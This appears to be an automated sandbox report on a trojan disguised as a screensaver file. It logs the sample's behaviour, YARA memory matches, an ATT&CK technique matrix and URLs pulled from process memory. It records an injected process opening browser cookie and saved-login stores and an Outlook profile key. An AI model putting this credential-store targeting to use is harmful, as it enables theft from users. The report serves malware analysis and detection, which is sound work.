                  Source: C:\Users\user\Desktop\MR-239-1599-A.scr.exeQueries volume information: C:\Windows\Fonts\wingding.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\MR-239-1599-A.scr.exeQueries volume information: C:\Windows\Fonts\YuGothR.ttc VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\MR-239-1599-A.scr.exeQueries volume information: C:\Windows\Fonts\YuGothM.ttc VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\MR-239-1599-A.scr.exeQueries volume information: C:\Windows\Fonts\YuGothL.ttc VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\MR-239-1599-A.scr.exeQueries volume information: C:\Windows\Fonts\YuGothB.ttc VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\MR-239-1599-A.scr.exeQueries volume information: C:\Windows\Fonts\YuGothM.ttc VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\MR-239-1599-A.scr.exeQueries volume information: C:\Windows\Fonts\YuGothL.ttc VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\MR-239-1599-A.scr.exeQueries volume information: C:\Windows\Fonts\YuGothB.ttc VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\MR-239-1599-A.scr.exeQueries volume information: C:\Windows\Fonts\holomdl2.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\MR-239-1599-A.scr.exeQueries volume information: C:\Windows\Fonts\AGENCYR.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\MR-239-1599-A.scr.exeQueries volume information: C:\Windows\Fonts\AGENCYB.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\MR-239-1599-A.scr.exeQueries volume information: C:\Windows\Fonts\ALGER.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\MR-239-1599-A.scr.exeQueries volume information: C:\Windows\Fonts\BKANT.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\MR-239-1599-A.scr.exeQueries volume information: C:\Windows\Fonts\ANTQUAI.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\MR-239-1599-A.scr.exeQueries volume information: C:\Windows\Fonts\ANTQUAB.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\MR-239-1599-A.scr.exeQueries volume information: C:\Windows\Fonts\BAUHS93.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\MR-239-1599-A.scr.exeQueries volume information: C:\Windows\Fonts\BELLB.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\MR-239-1599-A.scr.exeQueries volume information: C:\Windows\Fonts\BERNHC.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\MR-239-1599-A.scr.exeQueries volume information: C:\Windows\Fonts\BOD_R.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\MR-239-1599-A.scr.exeQueries volume information: C:\Windows\Fonts\BOD_I.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\MR-239-1599-A.scr.exeQueries volume information: C:\Windows\Fonts\BOD_B.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\MR-239-1599-A.scr.exeQueries volume information: C:\Windows\Fonts\BOD_CI.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\MR-239-1599-A.scr.exeQueries volume information: C:\Windows\Fonts\BOD_CB.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\MR-239-1599-A.scr.exeQueries volume information: C:\Windows\Fonts\BOOKOSB.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\MR-239-1599-A.scr.exeQueries volume information: C:\Windows\Fonts\BRLNSDB.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\MR-239-1599-A.scr.exeQueries volume information: C:\Windows\Fonts\BROADW.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\MR-239-1599-A.scr.exeQueries volume information: C:\Windows\Fonts\BRUSHSCI.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\MR-239-1599-A.scr.exeQueries volume information: C:\Windows\Fonts\BSSYM7.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\MR-239-1599-A.scr.exeQueries volume information: C:\Windows\Fonts\CALISTBI.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\MR-239-1599-A.scr.exeQueries volume information: C:\Windows\Fonts\CASTELAR.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\MR-239-1599-A.scr.exeQueries volume information: C:\Windows\Fonts\SCHLBKI.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\MR-239-1599-A.scr.exeQueries volume information: C:\Windows\Fonts\COLONNA.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\MR-239-1599-A.scr.exeQueries volume information: C:\Windows\Fonts\COOPBL.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\MR-239-1599-A.scr.exeQueries volume information: C:\Windows\Fonts\CURLZ___.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\MR-239-1599-A.scr.exeQueries volume information: C:\Windows\Fonts\DUBAI-LIGHT.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\MR-239-1599-A.scr.exeQueries volume information: C:\Windows\Fonts\ERASMD.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\MR-239-1599-A.scr.exeQueries volume information: C:\Windows\Fonts\ERASDEMI.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\MR-239-1599-A.scr.exeQueries volume information: C:\Windows\Fonts\FREESCPT.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\MR-239-1599-A.scr.exeQueries volume information: C:\Windows\Fonts\FTLTLT.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\MR-239-1599-A.scr.exeQueries volume information: C:\Windows\Fonts\GARABD.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\MR-239-1599-A.scr.exeQueries volume information: C:\Windows\Fonts\GLECB.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\MR-239-1599-A.scr.exeQueries volume information: C:\Windows\Fonts\GOTHIC.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\MR-239-1599-A.scr.exeQueries volume information: C:\Windows\Fonts\GOTHICB.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\MR-239-1599-A.scr.exeQueries volume information: C:\Windows\Fonts\GOUDOS.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\MR-239-1599-A.scr.exeQueries volume information: C:\Windows\Fonts\GOUDOSI.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\MR-239-1599-A.scr.exeQueries volume information: C:\Windows\Fonts\IMPRISHA.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\MR-239-1599-A.scr.exeQueries volume information: C:\Windows\Fonts\ITCEDSCR.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\MR-239-1599-A.scr.exeQueries volume information: C:\Windows\Fonts\JUICE___.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\MR-239-1599-A.scr.exeQueries volume information: C:\Windows\Fonts\KUNSTLER.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\MR-239-1599-A.scr.exeQueries volume information: C:\Windows\Fonts\LATINWD.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\MR-239-1599-A.scr.exeQueries volume information: C:\Windows\Fonts\LCALLIG.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\MR-239-1599-A.scr.exeQueries volume information: C:\Windows\Fonts\LEELAWAD.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\MR-239-1599-A.scr.exeQueries volume information: C:\Windows\Fonts\LEELAWDB.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\MR-239-1599-A.scr.exeQueries volume information: C:\Windows\Fonts\LFAXI.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\MR-239-1599-A.scr.exeQueries volume information: C:\Windows\Fonts\LSANSD.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\MR-239-1599-A.scr.exeQueries volume information: C:\Windows\Fonts\LTYPEBO.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\MR-239-1599-A.scr.exeQueries volume information: C:\Windows\Fonts\MOD20.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\MR-239-1599-A.scr.exeQueries volume information: C:\Windows\Fonts\PERTILI.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\MR-239-1599-A.scr.exeQueries volume information: C:\Windows\Fonts\TCBI____.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\MR-239-1599-A.scr.exeQueries volume information: C:\Windows\Fonts\TCCB____.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\MR-239-1599-A.scr.exeQueries volume information: C:\Windows\Fonts\TEMPSITC.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\MR-239-1599-A.scr.exeQueries volume information: C:\Windows\Fonts\VIVALDII.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\MR-239-1599-A.scr.exeQueries volume information: C:\Windows\Fonts\micross.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\MR-239-1599-A.scr.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\MR-239-1599-A.scr.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

                  Stealing of Sensitive Information

                  Source: Yara match File source: 3.2.MR-239-1599-A.scr.exe.400000.0.unpack, type: UNPACKEDPE
                  Source: Yara match File source: 3.2.MR-239-1599-A.scr.exe.400000.0.raw.unpack, type: UNPACKEDPE
                  Source: Yara match File source: 00000009.00000002.4094770900.0000000004C90000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                  Source: Yara match File source: 00000006.00000002.4093386507.00000000031B0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara match File source: 00000006.00000002.4091574286.0000000002C00000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                  Source: Yara match File source: 00000003.00000002.1945723633.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara match File source: 00000006.00000002.4093292133.0000000003170000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara match File source: 00000003.00000002.1946088682.0000000001020000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                  Source: Yara match File source: 00000003.00000002.1948359702.0000000003660000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                  Source: Yara match File source: 00000005.00000002.4092996752.0000000004050000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
                  Source: Yara match File source: 0.2.MR-239-1599-A.scr.exe.7620000.6.unpack, type: UNPACKEDPE
                  Source: Yara match File source: 0.2.MR-239-1599-A.scr.exe.2d8fe28.0.unpack, type: UNPACKEDPE
                  Source: Yara match File source: 0.2.MR-239-1599-A.scr.exe.2d8fe28.0.raw.unpack, type: UNPACKEDPE
                  Source: Yara match File source: 0.2.MR-239-1599-A.scr.exe.7620000.6.raw.unpack, type: UNPACKEDPE
                  Source: Yara match File source: 00000000.00000002.1654874999.0000000007620000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
                  Source: Yara match File source: 00000000.00000002.1651899586.0000000002D41000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: C:\Windows\SysWOW64\replace.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\CookiesJump to behavior
                  Source: C:\Windows\SysWOW64\replace.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\CookiesJump to behavior
                  Source: C:\Windows\SysWOW64\replace.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\CookiesJump to behavior
                  Source: C:\Windows\SysWOW64\replace.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login DataJump to behavior
                  Source: C:\Windows\SysWOW64\replace.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login DataJump to behavior
                  Source: C:\Windows\SysWOW64\replace.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Local StateJump to behavior
                  Source: C:\Windows\SysWOW64\replace.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local StateJump to behavior
                  Source: C:\Windows\SysWOW64\replace.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web DataJump to behavior
                  Source: C:\Windows\SysWOW64\replace.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\Jump to behavior

                  Remote Access Functionality

                  Source: Yara match | File source: 3.2.MR-239-1599-A.scr.exe.400000.0.unpack, type: UNPACKEDPE
                  Source: Yara match | File source: 3.2.MR-239-1599-A.scr.exe.400000.0.raw.unpack, type: UNPACKEDPE
                  Source: Yara match | File source: 00000009.00000002.4094770900.0000000004C90000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                  Source: Yara match | File source: 00000006.00000002.4093386507.00000000031B0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara match | File source: 00000006.00000002.4091574286.0000000002C00000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                  Source: Yara match | File source: 00000003.00000002.1945723633.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara match | File source: 00000006.00000002.4093292133.0000000003170000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara match | File source: 00000003.00000002.1946088682.0000000001020000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                  Source: Yara match | File source: 00000003.00000002.1948359702.0000000003660000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                  Source: Yara match | File source: 00000005.00000002.4092996752.0000000004050000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
                  Source: Yara match | File source: 0.2.MR-239-1599-A.scr.exe.7620000.6.unpack, type: UNPACKEDPE
                  Source: Yara match | File source: 0.2.MR-239-1599-A.scr.exe.2d8fe28.0.unpack, type: UNPACKEDPE
                  Source: Yara match | File source: 0.2.MR-239-1599-A.scr.exe.2d8fe28.0.raw.unpack, type: UNPACKEDPE
                  Source: Yara match | File source: 0.2.MR-239-1599-A.scr.exe.7620000.6.raw.unpack, type: UNPACKEDPE
                  Source: Yara match | File source: 00000000.00000002.1654874999.0000000007620000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
                  Source: Yara match | File source: 00000000.00000002.1651899586.0000000002D41000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Reconnaissance | Resource Development | Initial Access | Execution | Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Collection | Command and Control | Exfiltration | Impact
                  Gather Victim Identity Information | Acquire Infrastructure | Valid Accounts | Windows Management Instrumentation | 1 DLL Side-Loading | 312 Process Injection | 1 Masquerading | 1 OS Credential Dumping | 21 Security Software Discovery | Remote Services | 1 Email Collection | 1 Encrypted Channel | Exfiltration Over Other Network Medium | Abuse Accessibility Features
                  Credentials | Domains | Default Accounts | Scheduled Task/Job | Boot or Logon Initialization Scripts | 1 Abuse Elevation Control Mechanism | 1 Disable or Modify Tools | LSASS Memory | 2 Process Discovery | Remote Desktop Protocol | 11 Archive Collected Data | 3 Ingress Tool Transfer | Exfiltration Over Bluetooth | Network Denial of Service
                  Email Addresses | DNS Server | Domain Accounts | At | Logon Script (Windows) | 1 DLL Side-Loading | 41 Virtualization/Sandbox Evasion | Security Account Manager | 41 Virtualization/Sandbox Evasion | SMB/Windows Admin Shares | 1 Data from Local System | 4 Non-Application Layer Protocol | Automated Exfiltration | Data Encrypted for Impact
                  Employee Names | Virtual Private Server | Local Accounts | Cron | Login Hook | Login Hook | 312 Process Injection | NTDS | 1 Application Window Discovery | Distributed Component Object Model | Input Capture | 4 Application Layer Protocol | Traffic Duplication | Data Destruction
                  Gather Victim Network Information | Server | Cloud Accounts | Launchd | Network Logon Script | Network Logon Script | 11 Deobfuscate/Decode Files or Information | LSA Secrets | 2 File and Directory Discovery | SSH | Keylogging | Fallback Channels | Scheduled Transfer | Data Encrypted for Impact
                  Domain Properties | Botnet | Replication Through Removable Media | Scheduled Task | RC Scripts | RC Scripts | 1 Abuse Elevation Control Mechanism | Cached Domain Credentials | 13 System Information Discovery | VNC | GUI Input Capture | Multiband Communication | Data Transfer Size Limits | Service Stop
                  DNS | Web Services | External Remote Services | Systemd Timers | Startup Items | Startup Items | 4 Obfuscated Files or Information | DCSync | Remote System Discovery | Windows Remote Management | Web Portal Capture | Commonly Used Port | Exfiltration Over C2 Channel | Inhibit System Recovery
                  Network Trust Dependencies | Serverless | Drive-by Compromise | Container Orchestration Job | Scheduled Task/Job | Scheduled Task/Job | 22 Software Packing | Proc Filesystem | System Owner/User Discovery | Cloud Services | Credential API Hooking | Application Layer Protocol | Exfiltration Over Alternative Protocol | Defacement
                  Network Topology | Malvertising | Exploit Public-Facing Application | Command and Scripting Interpreter | At | At | 1 DLL Side-Loading | /etc/passwd and /etc/shadow | Network Sniffing | Direct Cloud VM Connections | Data Staged | Web Protocols | Exfiltration Over Symmetric Encrypted Non-C2 Protocol | Internal Defacement
                  [Behavior graph. ID: 1438436; Sample: MR-239-1599-A.scr.exe; Startdate: 08/05/2024; Architecture: WINDOWS; Score: 100]

                  Source | Detection | Scanner | Label | Link
                  MR-239-1599-A.scr.exe | 50% | ReversingLabs | Win32.Trojan.Strictor |
                  No Antivirus matches
                  No Antivirus matches
                  No Antivirus matches
                                                                                              high
                                                                                              https://www.valentinaetommaso.it/page-not-found-404/DfdOmQvPqYXHyvsLVgDsvnqUHhsrOM.exe, 00000009.00000002.4093206360.0000000003F1C000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                                              • Avira URL Cloud: safe
                                                                                              unknown
                                                                                              https://x3nadr4oqr3b20ld.appreplace.exe, 00000006.00000002.4094316967.000000000443C000.00000004.10000000.00040000.00000000.sdmp, DfdOmQvPqYXHyvsLVgDsvnqUHhsrOM.exe, 00000009.00000002.4093206360.000000000328C000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                                              • Avira URL Cloud: safe
                                                                                              unknown
                                                                                              https://assets.iv.lt/footer.htmlreplace.exe, 00000006.00000002.4094316967.0000000003DF4000.00000004.10000000.00040000.00000000.sdmp, replace.exe, 00000006.00000002.4096081074.0000000006490000.00000004.00000800.00020000.00000000.sdmp, DfdOmQvPqYXHyvsLVgDsvnqUHhsrOM.exe, 00000009.00000002.4093206360.0000000002C44000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 0000000A.00000002.2262693951.000000003EEA4000.00000004.80000000.00040000.00000000.sdmpfalse
                                                                                                high
                                                                                                https://www.arsys.es/servidores/vps?utm_source=parking&amp;utm_medium=link&amp;utm_campaign=vpsreplace.exe, 00000006.00000002.4094316967.00000000042AA000.00000004.10000000.00040000.00000000.sdmp, DfdOmQvPqYXHyvsLVgDsvnqUHhsrOM.exe, 00000009.00000002.4093206360.00000000030FA000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                                                  high
                                                                                                  https://d1di2lzuh97fh2.cloudfront.netreplace.exe, 00000006.00000002.4094316967.00000000050CC000.00000004.10000000.00040000.00000000.sdmp, DfdOmQvPqYXHyvsLVgDsvnqUHhsrOM.exe, 00000009.00000002.4093206360.0000000003F1C000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                                                    high
                                                                                                    https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=replace.exe, 00000006.00000003.2159480486.0000000007F48000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                      high
                                                                                                      https://www.iv.lt/replace.exe, 00000006.00000002.4094316967.0000000003DF4000.00000004.10000000.00040000.00000000.sdmp, replace.exe, 00000006.00000002.4096081074.0000000006490000.00000004.00000800.00020000.00000000.sdmp, DfdOmQvPqYXHyvsLVgDsvnqUHhsrOM.exe, 00000009.00000002.4093206360.0000000002C44000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 0000000A.00000002.2262693951.000000003EEA4000.00000004.80000000.00040000.00000000.sdmpfalse
                                                                                                        high
                                                                                                        https://www.ecosia.org/newtab/replace.exe, 00000006.00000003.2159480486.0000000007F48000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                          high
                                                                                                          https://d1di2lzuh97fh2.cloudfront.net/files/0u/0ua/0ua55l.js?ph=cb3a78e957replace.exe, 00000006.00000002.4094316967.00000000050CC000.00000004.10000000.00040000.00000000.sdmp, DfdOmQvPqYXHyvsLVgDsvnqUHhsrOM.exe, 00000009.00000002.4093206360.0000000003F1C000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                                                            high
                                                                                                            https://www.arsys.es/dominios?utm_source=parking&amp;utm_medium=link&amp;utm_campaign=dominiosreplace.exe, 00000006.00000002.4094316967.00000000042AA000.00000004.10000000.00040000.00000000.sdmp, DfdOmQvPqYXHyvsLVgDsvnqUHhsrOM.exe, 00000009.00000002.4093206360.00000000030FA000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                                                              high
                                                                                                              http://www.carterandcone.comlMR-239-1599-A.scr.exe, 00000000.00000002.1653756559.0000000006E82000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                              • URL Reputation: safe
                                                                                                              unknown
                                                                                                              http://www.fontbureau.com/designers/frere-user.htmlMR-239-1599-A.scr.exe, 00000000.00000002.1653756559.0000000006E82000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                high
                                                                                                                https://d1di2lzuh97fh2.cloudfront.net/files/3c/3cw/3cwfrk.css?ph=cb3a78e957replace.exe, 00000006.00000002.4094316967.00000000050CC000.00000004.10000000.00040000.00000000.sdmp, DfdOmQvPqYXHyvsLVgDsvnqUHhsrOM.exe, 00000009.00000002.4093206360.0000000003F1C000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                                                                  high
                                                                                                                  https://www.iv.lt/vps-serveriai/replace.exe, 00000006.00000002.4094316967.0000000003DF4000.00000004.10000000.00040000.00000000.sdmp, replace.exe, 00000006.00000002.4096081074.0000000006490000.00000004.00000800.00020000.00000000.sdmp, DfdOmQvPqYXHyvsLVgDsvnqUHhsrOM.exe, 00000009.00000002.4093206360.0000000002C44000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 0000000A.00000002.2262693951.000000003EEA4000.00000004.80000000.00040000.00000000.sdmpfalse
                                                                                                                    high
                                                                                                                    https://d1di2lzuh97fh2.cloudfront.net/files/32/32i/32i65q.css?ph=cb3a78e957replace.exe, 00000006.00000002.4094316967.00000000050CC000.00000004.10000000.00040000.00000000.sdmp, DfdOmQvPqYXHyvsLVgDsvnqUHhsrOM.exe, 00000009.00000002.4093206360.0000000003F1C000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                                                                      high
                                                                                                                      https://d1di2lzuh97fh2.cloudfront.net/files/4a/4a3/4a3t1k.css?ph=cb3a78e957replace.exe, 00000006.00000002.4094316967.00000000050CC000.00000004.10000000.00040000.00000000.sdmp, DfdOmQvPqYXHyvsLVgDsvnqUHhsrOM.exe, 00000009.00000002.4093206360.0000000003F1C000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                                                                        high
                                                                                                                        https://klientams.iv.lt/replace.exe, 00000006.00000002.4094316967.0000000003DF4000.00000004.10000000.00040000.00000000.sdmp, replace.exe, 00000006.00000002.4096081074.0000000006490000.00000004.00000800.00020000.00000000.sdmp, DfdOmQvPqYXHyvsLVgDsvnqUHhsrOM.exe, 00000009.00000002.4093206360.0000000002C44000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 0000000A.00000002.2262693951.000000003EEA4000.00000004.80000000.00040000.00000000.sdmpfalse
                                                                                                                          high
                                                                                                                          https://arsys.es/css/parking2.cssreplace.exe, 00000006.00000002.4094316967.00000000042AA000.00000004.10000000.00040000.00000000.sdmp, DfdOmQvPqYXHyvsLVgDsvnqUHhsrOM.exe, 00000009.00000002.4093206360.00000000030FA000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                                                                            high
                                                                                                                            https://www.webnode.com/it/?utm_source=text&amp;utm_medium=footer&amp;utm_content=wnd2&amp;utm_campareplace.exe, 00000006.00000002.4094316967.00000000050CC000.00000004.10000000.00040000.00000000.sdmp, DfdOmQvPqYXHyvsLVgDsvnqUHhsrOM.exe, 00000009.00000002.4093206360.0000000003F1C000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                                                                              high
                                                                                                                              https://www.arsys.es/hosting/revendedores?utm_source=parking&amp;utm_medium=link&amp;utm_campaign=rereplace.exe, 00000006.00000002.4094316967.00000000042AA000.00000004.10000000.00040000.00000000.sdmp, DfdOmQvPqYXHyvsLVgDsvnqUHhsrOM.exe, 00000009.00000002.4093206360.00000000030FA000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                                                                                high
                                                                                                                                http://www.fontbureau.com/designersGMR-239-1599-A.scr.exe, 00000000.00000002.1653756559.0000000006E82000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                  high
                                                                                                                                  https://d1di2lzuh97fh2.cloudfront.net/files/13/13s/13s9j7.css?ph=cb3a78e957replace.exe, 00000006.00000002.4094316967.00000000050CC000.00000004.10000000.00040000.00000000.sdmp, DfdOmQvPqYXHyvsLVgDsvnqUHhsrOM.exe, 00000009.00000002.4093206360.0000000003F1C000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                                                                                    high
                                                                                                                                    https://d1di2lzuh97fh2.cloudfront.net/files/01/01h/01hx1m.css?ph=cb3a78e957replace.exe, 00000006.00000002.4094316967.00000000050CC000.00000004.10000000.00040000.00000000.sdmp, DfdOmQvPqYXHyvsLVgDsvnqUHhsrOM.exe, 00000009.00000002.4093206360.0000000003F1C000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                                                                                      high
                                                                                                                                      http://www.fontbureau.com/designers/?MR-239-1599-A.scr.exe, 00000000.00000002.1653756559.0000000006E82000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                        high
                                                                                                                                        http://www.founder.com.cn/cn/bTheMR-239-1599-A.scr.exe, 00000000.00000002.1653756559.0000000006E82000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                        • Avira URL Cloud: safe
                                                                                                                                        unknown
                                                                                                                                        https://www.arsys.es?utm_source=parking&amp;utm_medium=link&amp;utm_campaign=arsysreplace.exe, 00000006.00000002.4094316967.00000000042AA000.00000004.10000000.00040000.00000000.sdmp, DfdOmQvPqYXHyvsLVgDsvnqUHhsrOM.exe, 00000009.00000002.4093206360.00000000030FA000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                                                                                          high
                                                                                                                                          http://www.fontbureau.com/designers?MR-239-1599-A.scr.exe, 00000000.00000002.1653756559.0000000006E82000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                            high
                                                                                                                                            https://d1di2lzuh97fh2.cloudfront.net/files/1a/1an/1anfpg.css?ph=cb3a78e957replace.exe, 00000006.00000002.4094316967.00000000050CC000.00000004.10000000.00040000.00000000.sdmp, DfdOmQvPqYXHyvsLVgDsvnqUHhsrOM.exe, 00000009.00000002.4093206360.0000000003F1C000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                                                                                              high
                                                                                                                                              https://www.arsys.es/servidores/cloud?utm_source=parking&amp;utm_medium=link&amp;utm_campaign=cloudreplace.exe, 00000006.00000002.4094316967.00000000042AA000.00000004.10000000.00040000.00000000.sdmp, DfdOmQvPqYXHyvsLVgDsvnqUHhsrOM.exe, 00000009.00000002.4093206360.00000000030FA000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                                                                                                high
                                                                                                                                                https://d1di2lzuh97fh2.cloudfront.net/files/04/04p/04pi85.css?ph=cb3a78e957replace.exe, 00000006.00000002.4094316967.00000000050CC000.00000004.10000000.00040000.00000000.sdmp, DfdOmQvPqYXHyvsLVgDsvnqUHhsrOM.exe, 00000009.00000002.4093206360.0000000003F1C000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                                                                                                  high
                                                                                                                                                  https://www.arsys.es/servidores/dedicados?utm_source=parking&amp;utm_medium=link&amp;utm_campaign=dereplace.exe, 00000006.00000002.4094316967.00000000042AA000.00000004.10000000.00040000.00000000.sdmp, DfdOmQvPqYXHyvsLVgDsvnqUHhsrOM.exe, 00000009.00000002.4093206360.00000000030FA000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                                                                                                    high
                                                                                                                                                    https://events.webnode.com/projects/-/events/replace.exe, 00000006.00000002.4094316967.00000000050CC000.00000004.10000000.00040000.00000000.sdmp, DfdOmQvPqYXHyvsLVgDsvnqUHhsrOM.exe, 00000009.00000002.4093206360.0000000003F1C000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                                                                                                      high
                                                                                                                                                      http://www.tiro.comMR-239-1599-A.scr.exe, 00000000.00000002.1653756559.0000000006E82000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                      • URL Reputation: safe
                                                                                                                                                      unknown
                                                                                                                                                      https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=replace.exe, 00000006.00000003.2159480486.0000000007F48000.00000004.00000020.00020000.00000000.sdmpfalse
